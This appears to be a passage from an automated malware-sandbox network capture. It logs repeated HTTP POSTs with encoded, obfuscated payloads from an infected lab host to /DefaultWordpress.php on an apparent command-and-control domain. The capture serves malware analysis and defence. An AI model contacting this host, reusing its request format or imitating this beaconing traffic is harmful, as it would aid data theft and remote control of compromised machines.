                                                          Oct 20, 2024 18:19:43.743916035 CEST2528OUTData Raw: 5b 59 5c 5b 5a 53 54 52 54 5b 52 57 50 5b 57 52 50 59 5d 5c 50 55 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Y\[ZSTRT[RWP[WRPY]\PUW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*09&8-V<U$$-U<>#=(Y$>'%,'+:X'>(#F $P.
                                                          Oct 20, 2024 18:19:44.201756001 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:44.597099066 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKSagUUZlkp2rEfpsW727nqU%2F9AW%2B6vhuJ9GMidV5JAwToJO%2FQThvcgKKKHhjv2IHWhhgIaiLiNuUBDpFo8QyCPqAoRhX45qMlf7w1NcmZxGQsV%2BHaj%2FJltCYRaohNVhgBCQfzwAHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54c8bc0496ed-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13535&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=106314&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          90192.168.2.550069188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:44.730155945 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:45.087820053 CEST2528OUTData Raw: 5b 5a 5c 5b 5a 5b 51 54 54 5b 52 57 50 58 57 55 50 50 5d 5b 50 51 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\[Z[QTT[RWPXWUPP][PQWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*3&&>+?^&;*<>#>< \$[$&"<38&]3!+:#F $P.,
                                                          Oct 20, 2024 18:19:45.511482000 CEST25INHTTP/1.1 100 Continue


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          91192.168.2.550070188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:44.812553883 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:45.165764093 CEST1948OUTData Raw: 5b 5b 5c 5c 5a 52 54 50 54 5b 52 57 50 52 57 5d 50 59 5d 59 50 56 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\\ZRTPT[RWPRW]PY]YPVWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _= .28%T< ?38=>$>'',1"<0;:Z3)+:#F $P.
                                                          Oct 20, 2024 18:19:45.600344896 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:45.852332115 CEST940INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JatTKc6wXBW3%2BQ9zypZ2n3QFBi3PITch72s5G0%2FwdnRc1GUU6nMP2cPICqaOsv0LIffsS3%2BdVtUcOGeSLJVrEcQKLvT9ru8om2pHV9TLFlRhDTmZS%2FSIVnDHDA%2FBSEOcv9D5v3MeLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54d17a4217ee-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11607&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=125216&cwnd=68&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 10 27 01 23 56 2a 06 37 0a 2c 3e 3d 57 2e 5b 3b 5a 2e 31 03 17 33 0d 31 00 32 04 0f 13 24 23 23 1d 21 05 22 11 34 3c 3d 57 2d 1c 28 5e 07 12 26 5c 2b 12 2f 04 2a 13 01 00 3f 38 09 00 21 37 06 1c 31 3d 09 53 33 3d 29 5e 2a 31 25 58 29 2e 3e 54 2d 0a 25 42 2f 38 0e 5d 37 2a 22 53 03 13 25 10 29 30 3b 00 21 1c 11 5b 2b 13 38 01 2b 28 32 1f 29 55 20 05 3f 38 30 07 2d 2e 26 5a 24 11 37 07 26 59 2b 01 26 03 23 19 27 10 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&'#V*7,>=W.[;Z.1312$##!"4<=W-(^&\+/*?8!71=S3=)^*1%X).>T-%B/8]7*"S%)0;![+8+(2)U ?80-.&Z$7&Y+&#'$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          92192.168.2.550072188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:46.023811102 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:46.368858099 CEST2520OUTData Raw: 5b 58 59 5e 5a 5e 51 50 54 5b 52 57 50 5a 57 56 50 59 5d 5a 50 55 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [XY^Z^QPT[RWPZWVPY]ZPUWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ X*&2;?,$(-V=- *Y$['-[$1$'+:[$.):#F $P.,
                                                          Oct 20, 2024 18:19:46.821268082 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:47.063595057 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PmAUtevQzj33Iwwj36U2gDFQFd1kKtZOGT2D1RHheefeEgQmHKOk%2FYlIZp9hJ09QixsblEEZDF%2FvJoDNukQpnxeztpxZZPDeOmQ9aVnbGnEFC4Xqn6UgKSHIXpQn75vdxWGaps%2BcTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54d918e77af4-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11188&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=131064&cwnd=38&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          93192.168.2.550073188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:47.201951981 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:47.556387901 CEST2528OUTData Raw: 5b 5d 59 5f 5a 5d 54 51 54 5b 52 57 50 5e 57 50 50 58 5d 56 50 56 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: []Y_Z]TQT[RWP^WPPX]VPVW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ Y( .&+U?#0^2(8(?3=_%<'+:[0&]<#F $P.4
                                                          Oct 20, 2024 18:19:48.004616022 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:48.786125898 CEST783INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DzXcGex1riKOrQWkDFmH0DzPQLUpc33lelpTYrmOPDTRIfiv2chvXHzDHko0J4m10qPHLtEPkj7ojaoo3zdt8nLyZLMMeMWpYeK4mZBx1GhBsz3Bww93mXvJh4Zjtjl%2BZ5Ut1uZMyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54e07c5324fc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11163&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=129679&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          94192.168.2.550074188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:48.917853117 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:49.277443886 CEST2528OUTData Raw: 5b 5f 59 5b 5a 5e 51 51 54 5b 52 57 50 5b 57 54 50 58 5d 5d 50 5d 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [_Y[Z^QQT[RWP[WTPX]]P]WU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*0>2;)(0'3+9W<.>(\$;X&"<38>\3(#F $P.
                                                          Oct 20, 2024 18:19:49.694061995 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:49.928862095 CEST793INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=upQbZukMyD56lmJXCKeCImJLh5jkEl2OjsseAIv%2Bj8G7ucBIQirxPUiYET9o0NPQJSK15oQvCU%2FsA7MBaJX%2FzgUN%2Bh%2BygT1XEA54wjAzldeBGE9dn8piBxXQoBBWOYW0cD65%2FytVSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54eb0ebe69a2-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13024&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=108806&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          95192.168.2.550075188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:50.058036089 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:50.415762901 CEST2528OUTData Raw: 5b 58 5c 5f 5f 5d 54 56 54 5b 52 57 50 5c 57 55 50 5e 5d 58 50 51 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [X\__]TVT[RWP\WUP^]XPQW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ Y*U1Z2S+#_'8.<-4Z)/['-;_$2/Z$^:Z0>><#F $P.<
                                                          Oct 20, 2024 18:19:50.831809998 CEST25INHTTP/1.1 100 Continue


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          96192.168.2.550076188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:50.859874964 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:51.212547064 CEST1948OUTData Raw: 5e 5a 5c 52 5f 5d 51 51 54 5b 52 57 50 53 57 56 50 5a 5d 59 50 56 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^Z\R_]QQT[RWPSWVPZ]YPVWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=>2> (0"?(Z)#$.?Y%!7Z38"X$*\?#F $P.
                                                          Oct 20, 2024 18:19:51.664496899 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:51.913064957 CEST938INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=metWjVbf7WSzcbvgzZMzrq%2F%2FLQQcX%2BSkxFuEdvx5GyIBvx0xNZrA1lQxDXCwCK0aHCvcktSsObluE3j4hpNYU33bVxog72bfkI9Rr3nFAInc1cxdsD6AIL7VELub9A1vb%2FSxgeav6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54f76955cecd-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11310&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=128733&cwnd=57&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 5f 24 59 2f 1e 2a 11 2f 0a 2d 07 2d 56 2d 03 2b 5f 39 22 3d 1a 33 0d 32 5c 31 3a 21 5b 26 23 27 13 36 3c 2e 5b 23 01 3d 1e 2e 0c 28 5e 07 12 26 5a 3d 3f 2b 07 3d 03 37 00 3f 3b 34 5e 21 34 3b 43 25 13 09 57 30 03 26 01 3e 31 25 10 2a 04 22 12 2e 27 3d 08 2f 2b 3f 01 34 00 22 53 03 13 25 5c 3d 0e 09 01 35 54 2b 13 3f 3e 37 13 28 16 08 58 3d 23 02 04 28 5e 24 02 2d 3d 3e 5a 25 3c 27 00 25 11 01 00 27 3a 01 51 27 3a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&_$Y/*/--V-+_9"=32\1:![&#'6<.[#=.(^&Z=?+=7?;4^!4;C%W0&>1%*".'=/+?4"S%\=5T+?>7(X=#(^$-=>Z%<'%':Q':$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          97192.168.2.550077188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:50.982585907 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:51.340172052 CEST2528OUTData Raw: 5b 50 59 5e 5f 5e 54 50 54 5b 52 57 50 5b 57 51 50 58 5d 56 50 55 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [PY^_^TPT[RWP[WQPX]VPUW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=3&+'_3-R<=+=< $,%2#'-3!<#F $P.
                                                          Oct 20, 2024 18:19:51.786750078 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:52.014199972 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YfjBxc1gn6C%2F0F3RmUQQs4WLEySfiqOxp%2Fg6pmWf6UrdDcCw5K7Oj4lVlZ2sZbM49R2LaBNo35gt0s9ogE%2Flo3zkL8QARmft2XrHejjGCh0Crvqxtd4KXtZxyS1wbV6M1zV4AXJCAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54f828d267d6-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13758&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=108684&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          98192.168.2.550078188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:52.137092113 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:52.495462894 CEST2528OUTData Raw: 5b 5a 5c 5c 5a 5b 51 52 54 5b 52 57 50 5b 57 53 50 5c 5d 5a 50 57 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\\Z[QRT[RWP[WSP\]ZPWWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ X)32&S(3$38.?(Y=/'<27Y%(!3=%+#F $P.
                                                          Oct 20, 2024 18:19:53.147727013 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:53.402476072 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNUBDQdunDPoj66FoFXtrPy%2FnKIKRDBO4pttr%2FMs5mtrYQ6mcHPo%2FuHLAbONmBotTYDiUlSKpWqcG4jBP8cPI2pvmWW3uQ6F9ilru3SMVKlDAWvGPnOpVtUGsWlo6kw8OKJJMVwHAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5500ab01176a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11180&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=126540&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          99192.168.2.550079188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:53.537488937 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:53.884363890 CEST2528OUTData Raw: 5b 51 5c 52 5a 5c 51 56 54 5b 52 57 50 59 57 52 50 50 5d 5b 50 57 57 58 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Q\RZ\QVT[RWPYWRPP][PWWX\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ]*%1;.(0<081(>,])<<X'/X$23Z'8'9?#F $P.(
                                                          Oct 20, 2024 18:19:54.304306984 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:54.686629057 CEST790INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
